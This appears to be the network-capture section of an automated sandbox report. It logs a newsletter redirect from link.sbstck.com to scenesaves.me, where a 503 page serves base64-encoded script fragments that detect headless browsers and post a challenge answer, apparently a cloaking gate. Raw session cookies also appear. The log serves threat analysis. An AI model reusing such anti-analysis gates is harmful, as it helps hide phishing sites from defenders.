                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:56:58 UTC1322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:56:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                set-cookie: AWSALBTG=QElurFvP+ofEQGmizTfZCJt4Cuo1NGxZvBUZaNHDhWb4i4CQl42tWxmhzPzAAZb3jBmuperwEtvMphlvzcVpo/iAPejQKPLAGCrWwZyPpgSTohMqThXF7NA9ntAoj5ZMa+u7yjxruLCjzwgYnAPTZ9BWgwVFgAsB8v3mRIi5QfW1; Expires=Thu, 10 Oct 2024 20:56:58 GMT; Path=/
                                                                                                                                                                                                                                set-cookie: AWSALBTGCORS=QElurFvP+ofEQGmizTfZCJt4Cuo1NGxZvBUZaNHDhWb4i4CQl42tWxmhzPzAAZb3jBmuperwEtvMphlvzcVpo/iAPejQKPLAGCrWwZyPpgSTohMqThXF7NA9ntAoj5ZMa+u7yjxruLCjzwgYnAPTZ9BWgwVFgAsB8v3mRIi5QfW1; Expires=Thu, 10 Oct 2024 20:56:58 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                set-cookie: cookie_storage_key=85ddf521-565b-458f-b9a6-a554b1794d7f; Max-Age=7776000; Domain=link.sbstck.com; Path=/; Expires=Wed, 01 Jan 2025 20:56:58 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                set-cookie: ajs_anonymous_id=%22a3abc7ee-f7dc-4cc3-9ce0-bb4972767d76%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Fri, 03 Oct 2025 20:56:58 GMT; SameSite=Strict
                                                                                                                                                                                                                                set-cookie: visit_id=%7B%22id%22%3A%22f7d34326-88c3-492d-96da-4e72056eef98%22%2C%22timestamp%22%3A%222024-10-03T20%3A56%3A58.120Z%22%2C%22utm_source%22%3A%22lims-newsletter-dde1ae.beehiiv.com%22%7D; Max-Age=1800; Domain=link.sbstck.com; Path=/; Expires=Thu, 03 Oct 2024 21:26:58 GMT; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                2024-10-03 20:56:58 UTC915INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 61 62 5f 74 65 73 74 69 6e 67 5f 69 64 3d 25 32 32 6f 72 2d 31 62 30 36 37 64 32 31 2d 37 61 66 61 2d 34 61 32 30 2d 38 39 66 39 2d 31 34 36 38 37 38 35 30 35 33 63 64 25 32 32 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 44 6f 6d 61 69 6e 3d 6c 69 6e 6b 2e 73 62 73 74 63 6b 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 46 72 69 2c 20 30 33 20 4f 63 74 20 32 30 32 35 20 32 30 3a 35 36 3a 35 38 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 45 78 70 72 65 73 73 0d 0a 78 2d 73 65 72 76 65 64 2d 62 79 3a 20 53 75 62 73 74 61 63 6b 0d 0a 78 2d 63 6c 75 73 74 65 72 3a 20 73 75 62 73
                                                                                                                                                                                                                                Data Ascii: set-cookie: ab_testing_id=%22or-1b067d21-7afa-4a20-89f9-1468785053cd%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Fri, 03 Oct 2025 20:56:58 GMT; HttpOnly; Secure; SameSite=Laxx-powered-by: Expressx-served-by: Substackx-cluster: subs
                                                                                                                                                                                                                                2024-10-03 20:56:58 UTC501INData Raw: 32 30 31 0d 0a 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 73 63 65 6e 65 73 61 76 65 73 2e 6d 65 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 69 6d 73 2d 6e 65 77 73 6c 65 74 74 65 72 2d 64 64 65 31 61 65 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 23 33 38 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 23 33 38 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 70 72 69 6e 74 2d 74 65 61 6d 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 73 63 65 6e 65 73 61 76 65 73 2e 6d 65 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 69 6d 73 2d 6e 65 77 73 6c 65 74 74 65 72
                                                                                                                                                                                                                                Data Ascii: 201<head><noscript><META http-equiv="refresh" content="0;URL=https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&#38;utm_medium=newsletter&#38;utm_campaign=sprint-team"></noscript><title>https://scenesaves.me/?utm_source=lims-newsletter
                                                                                                                                                                                                                                2024-10-03 20:56:58 UTC19INData Raw: 74 2d 74 65 61 6d 22 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: t-team")</script>
                                                                                                                                                                                                                                2024-10-03 20:56:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.449750184.28.90.27443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:56:59 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                2024-10-03 20:56:59 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                Cache-Control: public, max-age=244094
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:56:59 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449754188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC770OUTGET /?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Referer: https://link.sbstck.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1350INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:00 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Set-Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; path=/; expires=Fri, 04-Oct-24 20:56:54 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; path=/; expires=Fri, 04-Oct-24 20:56:54 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; path=/; expires=Fri, 04-Oct-24 20:56:54 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; path=/; expires=Fri, 04-Oct-24 20:56:54 GMT; Max-Age=86400;
                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktAMqGitfUBe8gRXfL9e3tsYjDa3516GbHwyruZjhLkjVgSZK22QHoLrSfZeGzpGVksVvRWdfj3gMwCpOF61NEaHoFsofZ%2FBinYIPQ%2BtHpdS7UXwZDHmEsM3P8mbnUjd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC32INData Raw: 43 46 2d 52 41 59 3a 20 38 63 63 66 64 37 39 31 34 63 34 33 37 32 37 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: CF-RAY: 8ccfd7914c43727d-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1369INData Raw: 63 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73
                                                                                                                                                                                                                                Data Ascii: ca7<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-s
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1369INData Raw: 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 76 4c 32 70 68 64 6d 46 7a 59 33 4a 70 63 48 51 67 63 48 56 36 65 6d 78 6c 49 47 5a 76 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 47 5a 70 5a 33 56 79 5a 53 42 76 64 58 51 67 64 47 38 67 5a 32 56 30 49 47 46 75 63 33 64 6c 63 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 67 68 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 43 46 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 70 65 79 38 71 63 47 68 68 62 6e 52 76 62 57 70 7a 4b 69 38 4b 61 57 59 6f 49 58 64 70 62 6d 52 76 64 79 35 66 58 33 42 6f 59 57 35 30 62 32 31 68 63 79 6c 37 4c 79
                                                                                                                                                                                                                                Data Ascii: gICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7Ly
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC508INData Raw: 49 43 41 67 49 43 41 67 49 43 41 67 4c 79 39 6c 62 6d 51 67 61 6d 46 32 59 58 4e 6a 63 6d 6c 77 64 43 42 77 64 58 70 36 62 47 55 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 48 68 6f 64 48 52 77 49 44 30 67 62 6d 56 33 49 46 68 4e 54 45 68 30 64 48 42 53 5a 58 46 31 5a 58 4e 30 4b 43 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 68 6f 64 48 52 77 4c 6d 39 75 63 6d 56 68 5a 48 6c 7a 64 47 46 30 5a 57 4e 6f 59 57 35 6e 5a 53 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68
                                                                                                                                                                                                                                Data Ascii: ICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1369INData Raw: 31 30 61 63 0d 0a 42 6d 61 58 4a 7a 64 45 5a 76 63 6d 30 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 6b 46 73 62 43 67 6e 61 57 35 77 64 58 51 6e 4b 54 73 4b 49 43 41 4b 49 43 42 70 5a 69 41 6f 61 57 35 77 64 58 52 47 61 57 56 73 5a 48 4d 75 62 47 56 75 5a 33 52 6f 49 44 34 67 4d 43 6b 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 6d 39 79 62 58 4e 62 4d 46 30 75 63 33 56 69 62 57 6c 30 4b 43 6b 37 43 69 41 67 66 53 42 6c 62 48 4e 6c 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 67
                                                                                                                                                                                                                                Data Ascii: 10acBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICg
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1369INData Raw: 57 52 6c 63 69 67 6e 59 32 6b 34 4c 55 31 71 56 58 6c 4e 63 48 4a 4e 63 30 46 71 55 7a 41 79 62 6b 31 30 53 55 39 49 55 30 74 4e 4a 79 77 67 58 7a 67 30 4d 6a 51 33 4d 7a 55 35 4b 54 73 67 4c 79 39 74 59 57 74 6c 49 48 52 6f 5a 53 42 68 62 6e 4e 33 5a 58 49 67 64 32 68 68 64 43 42 6c 64 6d 56 79 49 48 52 6f 5a 53 42 69 63 6d 39 33 63 32 56 79 49 47 5a 70 5a 33 56 79 5a 58 4d 67 61 58 51 67 62 33 56 30 49 48 52 76 49 47 4a 6c 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 68 6f 64 48 52 77 4c 6e 4e 6c 64 46 4a 6c 63 58 56 6c 63 33 52 49 5a 57 46 6b 5a 58 49 6f 4a 31 67 74 55 6d 56 78 64 57 56 7a 64 47 56 6b 4c 58 64 70 64 47 67 6e 4c 43 41 6e 57 45 31 4d 53 48 52 30 63 46 4a 6c 63 58 56 6c 63 33 51 6e
                                                                                                                                                                                                                                Data Ascii: WRlcignY2k4LU1qVXlNcHJNc0FqUzAybk10SU9IU0tNJywgXzg0MjQ3MzU5KTsgLy9tYWtlIHRoZSBhbnN3ZXIgd2hhdCBldmVyIHRoZSBicm93c2VyIGZpZ3VyZXMgaXQgb3V0IHRvIGJlCiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLXdpdGgnLCAnWE1MSHR0cFJlcXVlc3Qn
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1369INData Raw: 41 70 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 64 69 41 39 49 48 52 79 64 57 55 37 43 69 41 67 49 43 42 39 43 6e 30 4b 4c 79 39 32 49 44 30 67 64 48 4a 31 5a 54 73 67 4c 79 39 30 5a 58 4e 30 49 48 5a 68 63 69 42 75 64 57 78 73 5a 57 51 67 62 33 56 30 49 48 56 7a 5a 57 51 67 5a 6d 39 79 49 47 52 6c 59 6e 56 6e 5a 32 6c 75 5a 79 42 77 64 58 4a 77 62 33 4e 6c 43 6d 6c 6d 49 43 68 32 49 44 30 39 49 48 52 79 64 57 55 70 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 42 34 61 48 52 30 63 43 35 7a 5a 58 52 53 5a 58 46 31 5a 58 4e 30 53 47 56 68 5a 47 56 79 4b 43 64 49 63 47 68 58 54 6d 78 4e 4e 6b 5a 79 63 6b 35 43 4e 47 52 79 62 7a 4a 48 5a 30 70 4b 57 46 68 49 59 79 63 73 49 43 64 47 59 30 31 55 61 33 4a 52 65 45 56 57 4d 6e 5a 46 5a 47 68 56 65 54 42 6a 54
                                                                                                                                                                                                                                Data Ascii: ApKSB7CiAgICAgICAgdiA9IHRydWU7CiAgICB9Cn0KLy92ID0gdHJ1ZTsgLy90ZXN0IHZhciBudWxsZWQgb3V0IHVzZWQgZm9yIGRlYnVnZ2luZyBwdXJwb3NlCmlmICh2ID09IHRydWUpIHsKICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdIcGhXTmxNNkZyck5CNGRybzJHZ0pKWFhIYycsICdGY01Ua3JReEVWMnZFZGhVeTBjT
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC169INData Raw: 68 61 6e 67 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 65 28 62 29 3b 27 6c 6f 61 64 69 6e 67 27 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 65 2c 63 28 29 29 7d 7d 7d 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: hange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script></body></html>
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449755184.28.90.27443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                Cache-Control: public, max-age=244168
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:00 GMT
                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449753188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC1278OUTPOST /?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 22
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                X-Requested-TimeStamp-Expire:
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                X-Requested-TimeStamp-Combination:
                                                                                                                                                                                                                                X-Requested-Type-Combination: GET
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                X-Requested-Type: GET
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                X-Requested-with: XMLHttpRequest
                                                                                                                                                                                                                                X-Requested-TimeStamp:
                                                                                                                                                                                                                                ci8-MjUyMprMsAjS02nMtIOHSKM: 22343026
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://scenesaves.me
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
                                                                                                                                                                                                                                2024-10-03 20:57:00 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                                                                                                                                                                                                Data Ascii: name1=Henry&name2=Ford
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC1292INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:01 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Set-Cookie: 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; path=/; expires=Fri, 04-Oct-24 20:57:00 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: jWscW1sM_AmK7armmueciafWe4A=1727989020; path=/; expires=Fri, 04-Oct-24 20:57:00 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; path=/; expires=Fri, 04-Oct-24 20:57:00 GMT; Max-Age=86400;
                                                                                                                                                                                                                                Set-Cookie: D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c; path=/; expires=Fri, 04-Oct-24 20:57:00 GMT; Max-Age=86400;
                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
